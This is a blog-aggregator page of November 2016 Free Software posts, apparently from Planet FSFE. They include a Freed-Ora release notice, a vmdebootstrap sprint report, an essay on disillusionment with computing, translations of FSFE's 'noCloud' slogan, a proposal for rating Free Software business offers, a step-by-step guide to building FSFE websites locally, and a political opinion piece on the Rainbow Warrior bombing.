I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions have already appeared, it would be great to see any other ideas that people have about these choices.

Monday, 28 November 2016

Freed-Ora 25 released

Marcus's Blog | 11:13, Monday, 28 November 2016

Freed-Ora is a Libre version of Fedora GNU/Linux which comes with the Linux-libre kernel and the Icecat browser.
freedo
The procedure for creating Live media has changed within Fedora and the image have been build using livemedia-creator instead of livecd-creator. The documentation on how to build the image can be found here.

Please download the Freed-Ora 25 ISO and give feedback.

Friday, 25 November 2016

vmdebootstrap Sprint Report

Iain R. Learmonth | 12:06, Friday, 25 November 2016

This is now a little overdue, but here it is. On the 10th and 11th of November, the second vmdebootstrap sprint took place. Lars Wirzenius (liw), Ana Custura (ana_c) and myself were present. liw focussed on the core of vmdebootstrap, where he sketched out what the future of vmdebootstrap may look like. He documented this in a mailing list post and also presented (video).

Ana and myself worked on live-wrapper, which uses vmdebootstrap internally for the squashfs generation. I worked on improving logging, using a better method for getting paths within the image, enabling generation of Packages and Release files for the image archive and also made the images installable (live-wrapper 0.5 onwards will include an installer by default).

Ana worked on the inclusion of HDT and memtest86+ in the live images and enabled both ISOLINUX (for BIOS boot) and GRUB (for EFI boot) to boot the text-mode and graphical installers.

live-wrapper 0.5 was released on the 16th November with these fixes included. You can find live-wrapper documentation at https://live-wrapper.readthedocs.io/en/latest/. (The documentation still needs some work, some options may be incorrectly described).

Thanks to the sponsors that made this work possible. You’re awesome. (:

Monday, 21 November 2016

21 November 1916

DanielPocock.com - fsfe | 18:31, Monday, 21 November 2016

There has been a lot of news recently about the 100th anniversaries of various events that took place during the Great War.

On 21 November 1916, the SS Hunscraft sailed from Southampton to France. My great grandfather, Robert Pocock, was aboard.

He was part of the Australian Imperial Force, 3rd Divisional Train.

It's sad that Australians had to travel half way around the world to break up fist fights and tank battles. Sadder still that some people who romanticize the mistakes of imperialism are being appointment to significant positions of power.

Fortunately my great grandfather returned to Australia in one piece, many Australians didn't.

Robert Pocock's war medals

Sunday, 20 November 2016

On Not Liking Computers

Paul Boddie's Free Software-related blog » English | 23:57, Sunday, 20 November 2016

Adam Williamson recently wrote about how he no longer really likes computers. This attracted many responses from people who misunderstood him and decided to dispense career advice, including doses of the usual material about “following one’s passion” or “changing one’s direction” (which usually involves becoming some kind of “global nomad”), which do make me wonder how some of these people actually pay their bills. Do they have a wealthy spouse or wealthy parents or “an inheritance”, or do they just do lucrative contracting for random entities whose nature or identities remain deliberately obscure to avoid thinking about where the money for those jobs really comes from? Particularly the latter would be the “global nomad” way, as far as I can tell.

But anyway, Adam appears to like his job: it’s just that he isn’t interested in technological pursuits outside working hours. At some level, I think we can all sympathise with that. For those of us who have similarly pessimistic views about computing, it’s worth presenting a list of reasons why we might not be so enthusiastic about technology any more, particularly for those of us who also care about the ethical dimensions, not merely whether the technology itself is “any good” or whether it provides a sufficient intellectual challenge. By the way, this is my own list: I don’t know Adam from, well, Adam!

Lack of Actual Progress

One may be getting older and noticing that the same technological problems keep occurring again and again, never getting resolved, while seeing people with no sense of history provoke change for change’s – not progress’s – sake. After a while, or when one gets to a certain age, one expects technology to just work and that people might have figured out how to get things to communicate with each other, or whatever, by building on what went before. But then it usually seems to be the case that some boy genius or other wanted a clear run at solving such problems from scratch, developing lots of flashy features but not the mundane reliability that everybody really wanted.

People then get told that such “advanced” technology is necessarily complicated. Whereas once upon a time, you could pick up a telephone, dial a number, have someone answer, and conduct a half-decent conversation, now you have to make sure that the equipment is all connected up properly, that all the configurations are correct, that the Internet provider isn’t short-changing you or trying to suppress your network traffic. And then you might dial and not get through, or you might have the call mysteriously cut out, or the audio quality might be like interviewing a gang of squabbling squirrels speaking from the bottom of a dustbin/trashcan.

Depreciating Qualifications

One may be seeing a profession that requires a fair amount of educational investment – which, thanks to inept/corrupt politicians, also means a fair amount of financial investment – become devalued to the point that its practitioners are regarded as interchangeable commodities who can be coerced into working for as little as possible. So much for the “knowledge economy” when its practitioners risk ending up earning less than people doing so-called “menial” work who didn’t need to go through a thorough higher education or keep up an ongoing process of self-improvement to remain “relevant”. (Not that there’s anything wrong with “menial” work: without people doing unfashionable jobs, everything would grind to a halt very quickly, whereas quite a few things I’ve done might as well not exist, so little difference they made to anything.)

Now we get told that programming really will be the domain of “artificial intelligence” this time around. That instead of humans writing code, “high priests” will merely direct computers to write the software they need. Of course, such stuff sounds great in Wired magazine and rather amusing to anyone with any actual experience of software projects. Unfortunately, politicians (and other “thought leaders”) read such things one day and then slash away at budgets the next. And in a decade’s time, we’ll be suffering the same “debate” about a lack of “engineering talent” with the same “insights” from the usual gaggle of patent lobbyists and vested interests.

Neoliberal Fantasy Economics

One may have encountered the “internship” culture where as many people as possible try to get programmers and others in the industry to work for nothing, making them feel as if they need to do so in order to prove their worth for a hypothetical employment position or to demonstrate that they are truly committed to some corporate-aligned goal. One reads or hears people advocating involvement in “open source” not to uphold the four freedoms (to use, share, modify and distribute software), but instead to persuade others to “get on the radar” of an employer whose code has been licensed as Free Software (or something pretending to be so) largely to get people to work for them for free.

Now, I do like the idea of employers getting to know potential employees by interacting in a Free Software project, but it should really only occur when the potential employee is already doing something they want to do because it interests them and is in their interests. And no-one should be persuaded into doing work for free on the vague understanding that they might get hired for doing so.

The Expendable Volunteers

One may have seen the exploitation of volunteer effort where people are made to feel that they should “step up” for the benefit of something they believe in, often requiring volunteers to sacrifice their own time and money to do such free work, and often seeing those volunteers being encouraged to give money directly to the cause, as if all their other efforts were not substantial contributions in themselves. While striving to make a difference around the edges of their own lives, volunteers are often working in opposition to well-resourced organisations whose employees have the luxury of countering such volunteer efforts on a full-time basis and with a nice salary. Those people can go home in the evenings and at weekends and tune it all out if they want to.

No wonder volunteers burn out or decide that they just don’t have time or aren’t sufficiently motivated any more. The sad thing is that some organisations ignore this phenomenon because there are plenty of new volunteers wanting to “get active” and “be visible”, perhaps as a way of marketing themselves. Then again, some communities are content to alienate existing users if they can instead attract the mythical “10x” influx of new users to take their place, so we shouldn’t really be surprised, I suppose.

Blame the Powerless

One may be exposed to the culture that if you care about injustices or wrongs then bad or unfortunate situations are your responsibility even if you had nothing to do with their creation. This culture pervades society and allows the powerful to do what they like, to then make everyone else feel bad about the consequences, and to virtually force people to just accept the results if they don’t have the energy at the end of a busy day to do the legwork of bringing people to account.

So, those of us with any kind of conscience at all might already be supporting people trying to do the right thing like helping others, holding people to account, protecting the vulnerable, and so on. But at the same time, we aren’t short of people – particularly in the media and in politics – telling us how bad things are, with an air of expectation that we might take responsibility for something supposedly done on our behalf that has had grave consequences. (The invasion and bombing of foreign lands is one depressingly recurring example.) Sadly, the feeling of powerlessness many people have, as the powerful go round doing what they like regardless, is exploited by the usual cynical “divide and rule” tactics of other powerful people who merely see the opportunities in the misuse of power and the misery it causes. And so, selfishness and tribalism proliferate, demotivating anyone wanting the world to become a better place.

Reversal of Liberties

One may have had the realisation that technology is no longer merely about creating opportunities or making things easier, but is increasingly about controlling and monitoring people and making things complicated and difficult. That sustainability is sacrificed so that companies can cultivate recurring and rich profit opportunities by making people dependent on obsolete products that must be replaced regularly. And that technology exacerbates societal ills rather than helping to eradicate them.

We have the modern Web whose average site wants to “dial out” to a cast of recurring players – tracking sites, content distribution networks (providing advertising more often than not), font resources, image resources, script resources – all of which contribute to making the “signal-to-noise” ratio of the delivered content smaller and smaller all the time. Where everything has to maintain a channel of communication to random servers to constantly update them about what the user is doing, where they spent most of their time, what they looked at and what they clicked on. All of this requiring hundreds of megabytes of program code and data, burning up CPU time, wasting energy, making computers slow and steadily obsolete, forcing people to throw things away and to buy more things to throw away soon enough.

We have the “app” ecosystem experience, with restrictions on access, competition and interoperability, with arbitrarily-curated content: the walled gardens that the likes of Apple and Microsoft failed to impose on everybody at the dawn of the “consumer Internet” but do so now under the pretences of convenience and safety. We have social networking empires that serve fake news to each person’s little echo chamber, whipping up bubbles of hate and distracting people from what is really going on in the world and what should really matter. We have “cloud” services that often offer mediocre user experiences but which offer access from “any device”, with users opting in to both the convenience of being able to get their messages or files from their phone and the surveillance built into such services for commercial and governmental exploitation.

We have planned obsolescence designed into software and hardware, with customers obliged to buy new products to keep doing the things they want to do with those products and to keep it a relatively secure experience. And we have dodgy batteries sealed into devices, with the obligation apparently falling on the customers themselves to look after their own safety and – when the product fails – the impact of that product on the environment. By burdening the hapless user of technology with so many caveats that their life becomes dominated by them, those things become a form of tyranny, too.

Finding Meaning

Many people need to find meaning in their work and to feel that their work aligns with their own priorities. Some people might be able to do work that is unchallenging or uninteresting and then pursue their interests and goals in their own time, but this may be discouraging and demotivating over the longer term. When people’s work is not orthogonal to their own beliefs and interests but instead actively undermines them, the result is counterproductive and even damaging to those beliefs and interests and to others who share them.

For example, developing proprietary software or services in a full-time job, although potentially intellectually challenging, is likely to undermine any realistic level of commitment in one’s own free time to Free Software that does the same thing. Some people may prioritise a stimulating job over the things they believe in, feeling that their work still benefits others in a different way. Others may feel that they are betraying Free Software users by making people reliant on proprietary software and causing interoperability problems when those proprietary software users start assuming that everything should revolve around them, their tools, their data, and their expectations.

Although Adam wasn’t framing this shift in perspectives in terms of his job or career, it might have an impact on some people in that regard. I sometimes think of the interactions between my personal priorities and my career. Indeed, the way that Adam can seemingly stash his technological pursuits within the confines of his day job, while leaving the rest of his time for other things, was some kind of vision that I once had for studying and practising computer science. I think he is rather lucky in that his employer’s interests and his own are aligned sufficiently for him to be able to consider his workplace a venue for furthering those interests, doing so sufficiently to not need to try and make up the difference at home.

We live in an era of computational abundance and yet so much of that abundance is applied ineffectively and inappropriately. I wish I had a concise solution to the complicated equation involving technology and its effects on our quality of life, if not for the application of technology in society in general, then at least for individuals, and not least for myself. Maybe a future article needs to consider what we should expect from technology, as its application spreads ever wider, such that the technology we use and experience upholds our rights and expectations as human beings instead of undermining and marginalising them.

It’s not hard to see how even those who were once enthusiastic about computers can end up resenting them and disliking what they have become.

Friday, 18 November 2016

Localizing our noCloud slogan

English Planet – Dreierlei | 15:12, Friday, 18 November 2016

there is noCloud

At FSFE we have been asked many times to come up with translations of our popular “There is no CLOUD, just other’s peoples computers” slogan. This week we started the localization by asking our translator team and have been very surprised to see they already come up with translations in 16 different languages.

In addition, our current trainee Olga Gkotsopoulou and asked her international network and we asked on twitter for additional translations. And, what can I say? crowdsourcing seldom felt so appealing. In two hours we got 8 more translations and after 24 hours we already had 30 translations.

The quickness in that we got so many translations shows us that the slogan is indeed at the pulse of time. People are happy to translate it because they love to send this message out. At the time of writing we now have 36 translations and two dialects on our wiki-page:

[AR] لا يوجد غيم, هناك أخرين كمبيوتر
[BR] N’eus Cloud ebet. Urzhiataerioù tud all nemetken.
[CAT] No hi ha cap núvol, només ordinadors d’altres persones.
[DA] Der findes ingen sky, kun andre menneskers computere.
[DE] Es gibt keine Cloud, nur die Computer anderer Leute.
[EL] Δεν υπάρχει Cloud, μόνο υπολογιστές άλλων.
[EU] Ez dago lainorik, beste pertsona batzuen ordenagailuak baino ez.
[EO] Nubon ne ekzistas sed fremdaj komputiloj.
[ES] La nube no existe, son ordenadores de otras personas.
[ET] Pole mingit pilve, on vaid teiste inimeste arvutid.
[FA] فضای ابری در کار نیست، تنها رایانه های دیگران
[FR] Il n’y a pas de cloud, juste l’ordinateur d’un autre.
[FI] Ei ole pilveä, vain toisten ihmisten tietokoneita.
[GL] A nube non existe, só son ordenadores doutras persoas.
[GA] Níl aon néal ann, níl ann ach ríomhairí daoine eile.
[HE] אין ענן, רק מחשבים של אנשים אחרים
[HY] Չկա ամպ, կա պարզապես այլ մարդկանց համակարգիչներ
[IT] Il cloud non esiste, sono solo i computer di qualcun altro
[JP] クラウドはありません。 他の人のコンピュータだけがあります。
[KA] არ არის საწყობი ,მხოლოდ ბევრი ეტიკეტებია ხალხში სხვადასხვა ენებზე
[KL] Una pujoqanngilaq – qarasaasiat allat kisimik
[KO] 구름은 없다. 다른 사람의 컴퓨터일뿐.
[LB] Et gëtt keng Cloud, just anere Leit hier Computeren.
[NL] De cloud bestaat niet, alleen computers van anderen
[TR] Bulut diye bir şey yok, sadece başkalarının bilgisayarları var.
[TL] walang ulap kundi mga kompyuter ng ibang tao
[PL] Nie ma chmury, są tylko komputery innych.
[PT] Não há nuvem nenhuma, há apenas computadores de outras pessoas.
[RO] Nu există nici un nor, doar calculatoarele altor oameni.
[RS] Ne postoji Cloud, već samo računari drugih ljudi.
[RU] Облака нет, есть чужие компьютеры.
[SQ] S’ka cloud, thjesht kompjutera personash të tjerë.
[SV] Det finns inget moln, bara andra människors datorer.
[UR] کلاوڈ سرور کچھ نہیی، بس کسی اور کاکمپیوٹر۔
[VI] Không có Đám mây, chỉ có những chiếc máy tính của kẻ khác.
[ZH] 没有云,只有人们的电脑.

And again: If you miss your language or dialect, add it to the wiki, leave it as a comment or write me a message and I will add it.

Tuesday, 15 November 2016

There is no Free Software company - But!

Matthias Kirschner's Web log - fsfe | 09:22, Tuesday, 15 November 2016

Since the start of the FSFE 15 years ago, the people involved were certain that companies are a crucial part to reach our goal of software freedom. For many years we have explained to companies – IT as well as non-IT – what benefits they have from Free Software. We encourage individuals and companies to pay for Free Software, as much as we encourage companies to use Free Software in their offers.

A factory building

While more people demanded Free Software, we also saw more companies claiming something is Free Software or Open Source Software although it is not. This behaviour – also called "openwashing" is nothing special for Free Software, some companies also claim something is "organic" or "fair-trade" although it is not. As the attempts to get a trademark for "Open Source" failed, it is difficult to legally prevent companies from calling something "Free Software" or "Open Source Software" although it does neither comply with the Free Software definition by the Free Software Foundation nor with the Open Source definition by the Open Source Initiative.

When the FSFE was founded in 2001 there was already the idea to encourage and support companies making money with Free Software by starting a "GNU business network". One of the stumbling blocks for that was always the definition of a Free Software company. It cannot just be the usage of Free Software or the contribution to Free Software, but also needs to include what rights they are offering their customers. Another factor was whether the revenue stream is tied to proprietary licensing conditions. Would we also allow a small revenue from proprietary software, and how high is that that you can still consider it a Free Software company?

It turned out to be a very complicated issue, and although we were regularly discussing it we did not have an idea how to approach the problems in defining a Free Software company.

During our last meeting of the FSFE's General Assembly – triggered by our new member Mirko Böhm – we came to the conclusion that there was a flaw in our thinking and that it does not make sense to think about "Free Software companies". In hindsight it might look obvious, but for me the discussion was an eye opener, and I have the feeling that was a huge step for software freedom.

As a side note: When we have the official general assembly of the FSFE we always use this opportunity to have more discussions during the days before or after. Sometimes they focus on internal topics, organisational changes, but often there is brainstorming about the "hot topics of software freedom" and where the FSFE has to engage in the long run. At this year's meeting, from 7 to 9 October, inspired by Georg Greve's and Nicolas Dietrich's input, we spent the whole Saturday thinking about the long term challenges for software freedom with the focus on the private sector.

We talked about the challenges of software freedom presented by economies of scale, networking effects, investment preference, and users making convenience and price based decisions over values – even when they declare themselves value conscious.

One problem preventing a wider spread of software freedom identified there was that Free Software is being undermined by companies that abuse the positive brand recognition of Free Software / Open Source by "openwashing" themselves. Sometimes they offer products that do not even have a Free Software version. This penalises companies and groups that aim to work within the principles of Free Software and damages the recognition of Free Software / Open Source in the market. The consequence is reduced confidence in Free Software, fewer developers working on it, fewer companies providing it, and less Free Software being written in favour of proprietary models.

In the discussion, one question kept arising. Is an activity that is good for Free Software which is done by one small company as their sole activity more valuable than if the same thing were done as part of a larger enterprise? We all agree that a small company which is using and distributing exclusively Free Software, and has done so for many years, and no part of the software they wrote or included was ever non-free software is good. But what happens if said small, focused company got purchased by a larger entity? Does that invalidate the benefit of what is being done?

We concluded that good action remains good action, and that the FSFE should encourage good actions. So instead of focusing on the company as such we should focus on the activity itself; we should think about "Free Software business activities", "Free Software business offers", and such. My feeling was that this was the moment the penny had dropped, while others and me realised the flaw in our previous thinking. We need action oriented approaches and we need to look at activities individually.

There was still the question where to draw the line between acceptable or useful activities and harmful ones. This is not a black and white issue, and when assessing the impact for software freedom there are different levels. For example if you evaluate a sharing platform, you might find out that the core is Free Software, but the sharing module itself is proprietary. This is a bad offer if you want to run a competing sharing platform using Free Software.

The counter example of an acceptable offer was a collaboration software that was useful and complete, but where connecting a proprietary client would itself require a proprietary connector. It was also discussed that sometimes you need to interface with proprietary systems through proprietary libraries that do not allow connecting with Free Software unless one were to first replace the entire API/library itself.

Ultimately a consensus emerged around a focus on the four freedoms of Free Software in relation to the question of whether the software is sufficiently complete and useful to run a competing business.

One thought was to run "test cases" to evaluate how good an offer is on the Free Software scale. Something like a regular bulletin about best and worst practice. We could look at a business activities and study it according to the criteria below, evaluate it, making that evaluation and its conclusions public. That way we can help to build customer awareness about software freedom. Here is a first idea for a scale:

  • EXCELLENT: Free Software only and on all levels, no exceptions.

  • GOOD: Free Software as a complete, useful, and fully supportable product. Support available for Free Software version.

  • ACCEPTABLE: Proprietary interfaces to proprietary systems and applications, especially complex systems that require complex APIs/libraries/SDKs, as long as the above is still met.

  • BAD: Essential / important functionality only available proprietary, critical functionality missing from Free Software (one example for an essential functionality was LDAP connector).

  • REALLY BAD: Fully proprietary, but claiming to be Free Software / Open Source Software.

Now I would like to know from you: what is your first reaction on this? Would you like to add something? Do you have ideas what should be included in a checklist for such a test? Would you be interested to help us to evaluate how good some offers are on such a scale?

To summarise, I believe it was a mistake to think about businesses as a whole before and that if we want to take the next big steps we should think about Free Software business offers / activities – at least until we have a better name for what I described above. We should help companies that they are not deluded by people just claiming something is Free Software, but give them the tools to check themselves.

PS: Thank you very much to the participants at the FSFE meeting, especially Georg Greve for pushing this topic and internally summarising our discussion, and Mirko Böhm who's contribution was the trigger in the discussion for realising our previous flaw in thinking.

Sunday, 13 November 2016

Build FSFE websites locally

English – Max's weblog | 23:00, Sunday, 13 November 2016

Note: This guide is also available in FSFE’s wiki now, and it will be the only version maintained. So please head over to the wiki if you’re planning to follow this guide.

Those who create, edit, and translate FSFE websites already know that the source files are XHTML files which are build with a XSLT processor, including a lot of custom stuff. One of the huge advantages from that is that we don’t have to rely on dynamic website processors and databases, on the other hand there are a few drawbacks as well: websites need a few minutes to be generated by the central build system, and it’s quite easy to mess up with the XML syntax. Now if an editor wants to create or edit a page, she needs to wait a few minutes until the build system has finished everytime she wants to test how the website looks like. So in this guide I will show how to build single websites on your own computer in a fraction of the FSFE’s system build time, so you’ll only need to commit your changes as soon as the file looks as you want it. All you need is a bit hard disk space and around one hour time to set up everything.

The whole idea is based on what FSFE’s webmaster Paul Hänsch has coded and written. On his blog he explains the new build script. He explains how to build files locally, too. However, this guide aims to make it a bit easier and more verbose.

Before we’re getting started, let me shortly explain the concept of what we’ll be doing. Basically, we’ll have three directories: trunk, status, and fsfe.org. Most likely you already have trunk, it’s a clone of the FSFE’s main SVN repository, and the source of all operations. All those files in there have to be compiled to generate the final HTML files we can browse. The location of these finished files will be fsfe.org. status, the third directory, contains error messages and temporary files.

After we (1) created these directories, partly by downloading a repository with some useful scripts and configuration files, we’ll (2) build the whole FSFE website on our own computer. In the next step, we’ll (3) set up a local webserver so you can actually browse these files. And lastly we’ll (4) set up a small script which you can use to quickly build single XHTML files. Last but not least I’ll give some real-world examples.

1. Clone helper repository

Firstly, clone a git repository which will give you most needed files and directories for the further operations. It has been created by me and contains configuration files and the script that will make building of single files easier. Of course, you can also do everything manually.

In general, this is the directory structure I propose. In the following I’ll stick to this scheme. Please adapt all changes if your folder tree looks differently.

trunk (~700 MB):      ~/subversion/fsfe/fsfe-web/trunk/
status (~150 MB):     ~/subversion/fsfe/local-build/status/
fsfe.org (~1000 MB):  ~/subversion/fsfe/local-build/fsfe.org/

(For those not so familiar with the GNU/Linux terminal: ~ is the short version of your home directory, so for example /home/user. ~/subversion is the same as /home/USER/subversion, given that your username is USER)

To continue, you have to have git installed on your computer (sudo apt-get install git). Then, please execute via terminal following command. It will copy the files from my git repository to your computer and already contains the folders status and fsfe.org.

git clone https://src.mehl.mx/mxmehl/fsfe-local-build.git ~/subversion/fsfe/local-build

Now we take care of trunk. In case you already have a copy of trunk on your computer, you can use this location, but please do a svn up beforehand and be sure that the output of svn status is empty (so no new or modified files on your side). If you don’t have trunk yet, download the repository to the proposed location:

svn --username $YourFSFEUsername co https://svn.fsfe.org/fsfe-web/trunk ~/subversion/fsfe/fsfe-web/trunk

2. Build full website

Now we have to build the whole FSFE website locally. This will take a longer time but we’ll only have to do it once. Later, you’ll just build single files and not >14000 as we do now.

But first, we have to install a few applications which are needed by the build script (Warning: it’s possible your system lacks some other required applications which were already installed on mine. If you encounter any command not found errors, please report them in the comments or by mail). So let’s install them via the terminal:

sudo apt-get install make libxslt

Note: libxslt may have a different name in your distribution, e.g. libxslt1.1 or libxslt2.

Now we can start building.The full website build can be started with

~/subversion/fsfe/fsfe-web/trunk/build/build_main.sh --statusdir ~/subversion/fsfe/local-build/status/ build_into ~/subversion/fsfe/local-build/fsfe.org/

See? We use the build routine from trunk to launch building trunk. All status messages are written to status, and the final website will reside in fsfe.org. Mind differing directory names if you have another structure than I do. This process will take a long time, depending on your CPU power. Don’t be afraid of strange messages and massive walls of text ;-)

After the long process has finished, navigate to the trunk directory and execute svn status. You may see a few files which are new:

max@bistromath ~/s/f/f/trunk> svn status
?       about/printable/archive/printable.en.xml
?       d_day.en.xml
?       d_month.en.xml
?       d_year.en.xml
?       localmenuinfo.en.xml
[...]

These are leftover from the full website build. Because trunk is supposed to be your productive source directory where you also make commits to the FSFE SVN, let’s delete these files. You won’t need them anymore.

rm about/printable/archive/printable.en.xml d_day.en.xml d_month.en.xml d_year.en.xml localmenuinfo.en.xml
rm tools/tagmaps/*.map

Afterwards, the output of svn status should be empty again. It is? Fine, let’s go on! If not, please also remove those files (and tell me which files were missing).

3. Set up local webserver

After the full build is completed, you can install a local webserver. This is necessary to actually display the locally built files in your browser. In this example, I assume you don’t already have a webserver installed, and that you’re using a Debian-based operating system. So let’s install lighttpd which is a thin and fast webserver, plus gamin which lighttpd needs in some setups:

sudo apt-get install lighttpd gamin

To make Lighttpd running properly we need a configuration file. This has to point the webserver to show files in the fsfe.org directory. You already downloaded my recommended config file (lighttpd-fsfe.conf.sample) by cloning the git repository. But you’ll have to modify the path accordingly and rename it. So rename the file to lighttpd-fsfe.conf, open it and change following line to match the actual and absolute path of the fsfe.org directory (~ does not work here):

server.document-root = "/home/USER/subversion/fsfe/local-build/fsfe.org"

Now you can test whether the webserver is correctly configured. To start a temporary webserver process, execute the next command in the terminal:

lighttpd -Df ~/subversion/fsfe/local-build/lighttpd-fsfe.conf

Until you press Ctrl+C, you should be able to open your local FSFE website in any browser using the URL http://localhost:5080. For example, open the URL http://localhost:5080/contribute/contribute.en.html in your browser. You should see basically the same website as the original fsfe.org website. If not, double-check the paths, if the lighttpd process is still running, or if the full website build is already finished.

4. Single page build script

Until now, you didn’t see much more than you can see on the original website. But in this step, we’ll configure and start using a Bash script (fsfe-preview.sh) I’ve written to make a preview of a locally edited XHTML file as comfortable as possible. You already downloaded it by cloning the repository.

First, rename and edit the script’s configuration file config.cfg.sample. Rename it to config.cfg and open it. The file contains all paths we already used here, so please adapt them to your structure if necessary. Normally, it should be sufficient to modify the values for LOC_trunk (trunk directory) and LOC_out (fsfe.org directory), the rest can be left with the default values.

Another feature of the fsfe-preview is to automatically check the XML syntax of the files. For this, libxml2-utils has to be installed which contains xmllint. Please execute:

sudo apt-get install libxml2-utils

Now let’s make the script easy to access via the terminal for future usage. For this, we’ll create a short link to the script from one of the binary path directories. Type in the terminal:

sudo ln -s ~/subversion/fsfe/local-build/fsfe-preview.sh /usr/bin/fsfe-preview

From this moment on, you should be able to call fsfe-preview from anywhere in your terminal. Let’s make a test run. Modify the XHTML source file contribute/contribute.en.xhtml and edit some obvious text or alter the title. Now do:

fsfe-preview ~/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml

As output, you should see something like:

[INFO] Using file /home/max/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml as source...
[INFO] XHTML file detected. Going to build into /home/max/subversion/fsfe/local-build/fsfe.org/contribute/contribute.en.html ...
[INFO] Starting webserver

[SUCCESS] Finished. File can be viewed at http://localhost:5080/contribute/contribute.en.html

Now open the mentioned URL http://localhost:5080/contribute/contribute.en.html and take a look whether your changes had an effect.

Recommended workflows

In this section I’ll present a few of the cases you might face and how to solve them with the script. I presume you have your terminal opened in the trunk directory.

Preview a single file

To preview a single file before uploading it, just edit it locally. The file has to be located in the trunk directory, so I suggest to only use one SVN trunk on your computer. It makes almost no sense to store your edited files in different folders. To preview it, just give the path to the edited file as argument for fsfe-preview, just as we did in the preceding step:

fsfe-preview activities/radiodirective/statement.en.xhtml

The script detects whether the file has to be built with the XSLT processor (.xhtml files), or if it just can be copied to the website without any modification (e.g. images).

Copy many files at once

Beware that all files you added in your session have to be processed with the script. For example, if you create a report with many images included and want to preview it, you will have to copy all these images to the output directory as well, and not only the XHTML file. For this, there is the –copy argument. This circumvents the whole XSLT build process and just plainly copies the given files (or folders). In this example, the workflow could look like the following: The first line copies some images, the second builds the corresponding XHTML file which makes use of these images:

fsfe-preview --copy news/2016/graphics/report1.png news/2016/graphics/report2.jpg
fsfe-preview news/2016/news-20161231-01.en.xhtml

Syntax check

In general, it’s good to check the XHTML syntax before editing and commiting files to the SVN. The script fsfe-preview already contains these checks but it’s good to be able to use it anyway. If you didn’t already do it before, install libxml2-utils on your computer. It contains xmllint, a syntax checker for XML files. You can use it like this:

xmllint --noout work.en.xhtml

If there’s no output (–noout), the file has a correct syntax and you’re ready to continue. But you may also see something like

work.en.xhtml:55: parser error : Opening and ending tag mismatch: p line 41 and li
      </li>
           ^

In this case, this means that the <p> tag starting in line 41 isn’t closed properly.

Drawbacks

The presented process and script has a few drawbacks. For example you aren’t able to preview certain very dynamic pages or parts of pages, or those depending on CGI scripts. In most cases you’ll never encounter these, but if you’re getting active with the FSFE’s webmaster team it may happen that you’ll have to fall back on the standard central build system.

Any other issues? Feel free to report them as they will help to improve FSFE’s editors to work more efficiently :-)

Changelog

29 November 2016: Jonas has pointed out a few bugs and issues with a different GNU/Linux distribution. Should be resolved.

Are all victims of French terrorism equal?

DanielPocock.com - fsfe | 10:50, Sunday, 13 November 2016

Some personal observations about the terrorist atrocities around the world based on evidence from Wikipedia and other sources

The year 2015 saw a series of distressing terrorist attacks in France. 2015 was also the 30th anniversary of the French Government's bombing of a civilian ship at port in New Zealand, murdering a photographer who was on board at the time. This horrendous crime has been chronicled in various movies including The Rainbow Warrior Conspiracy (1989) and The Rainbow Warrior (1993).

The Paris attacks are a source of great anxiety for the people of France but they are also an attack on Europe and all civilized humanity as well. Rather than using them to channel more anger towards Muslims and Arabs with another extended (yet ineffective) state of emergency, isn't it about time that France moved on from the evils of its colonial past and "drains the swamp" where unrepentant villains are thriving in its security services?

François Hollande and Ségolène Royal. Royal's brother Gérard Royal allegedly planted the bomb in the terrorist mission to New Zealand. It is ironic that Royal is now Minister for Ecology while her brother sank the Greenpeace flagship. If François and Ségolène had married (they have four children together), would Gérard be the president's brother-in-law or terrorist-in-law?

The question has to be asked: if it looks like terrorism, if it smells like terrorism, if the victim of that French Government attrocity is as dead as the victims of Islamic militants littered across the floor of the Bataclan, shouldn't it also be considered an act of terrorism?

If it was not an act of terrorism, then what is it that makes it differ? Why do French officials refer to it as nothing more than "a serious error", the term used by Prime Minister Manuel Valls during a recent visit to New Zealand in 2016? Was it that the French officials felt it was necessary for Liberté, égalité, fraternité? Or is it just a limitation of the English language that we only have one word for terrorism, while French officials have a different word for such acts carried out by those who serve their flag?

If the French government are sincere in their apology, why have they avoided releasing key facts about the atrocity, like who thought up this plot and who gave the orders? Did the soldiers involved volunteer for a mission with the code name Opération Satanique, or did any other members of their unit quit rather than have such a horrendous crime on their conscience? What does that say about the people who carried out the orders?

If somebody apprehended one of these rogue employees of the French Government today, would they be rewarded with France's highest honour, like those tourists who recently apprehended an Islamic terrorist on a high-speed train?

If terrorism is such an absolute evil, why was it so easy for the officials involved to progress with their careers? Would an ex-member of an Islamic terrorist group be able to subsequently obtain US residence and employment as easily as the French terror squad's commander Louis-Pierre Dillais?

When you consider the comments made by Donald Trump recently, the threats of violence and physical aggression against just about anybody he doesn't agree with, is this the type of diplomacy that the US will practice under his rule commencing in 2017? Are people like this motivated by a genuine concern for peace and security, or are these simply criminal acts of vengence backed by political leaders with the maturity of schoolyard bullies?

Wednesday, 09 November 2016

OpenRheinRuhr 2016 – A report of iron and freedom

English – Max's weblog | 21:55, Wednesday, 09 November 2016

orr2016_iron

Our Dutch iron fighters

Last weekend, I visited Oberhausen to participate in OpenRheinRuhr, a well-known Free Software event in north-western Germany. Over two days I was part of FSFE’s booth team, gave a talk, and enjoyed talking to tons of like-minded people about politics, technology and other stuff. In the next few minutes you will learn what coat hangers have to do with flat irons and which hotel you shouldn’t book if you plan to visit Oberhausen.

On Friday, Matthias, Erik, and I arrived at the event location which normally is a museum collecting memories of heavy industries in the Ruhr area: old machines, the history and background of industry workers, and pictures of people fighting for their rights. Because we arrived a bit too early we helped the (fantastic!) orga team with some remaining work in the exhibition hall before setting up FSFE’s booth. While doing so, we already sold the first tshirt and baby romper (is this a new record?) and had nice talks. Afterwards we enjoyed a free evening and prepared for the next busy day.

But Matthias and I faced a bad suprised: our hotel rooms were build for midgets and lacked a few basic features. For example, Matthias‘ room had no heating, and in my bathroom someone has stolen the shelf. At least I’ve been given a bedside lamp – except the little fact that the architect forgot to install a socket nearby. Another (semi-)funny bug were the emergency exits in front of our doors: by escaping from dangers inside the hotel, taking these exits won’t rescue you but instead increase the probability of dying from severe bone fractures. So if you ever need a hotel in Oberhausen, try to avoid City Lounge Hotel by any means. Pictures at the end of this article.

orr2016_hall1

The large catering and museum hall

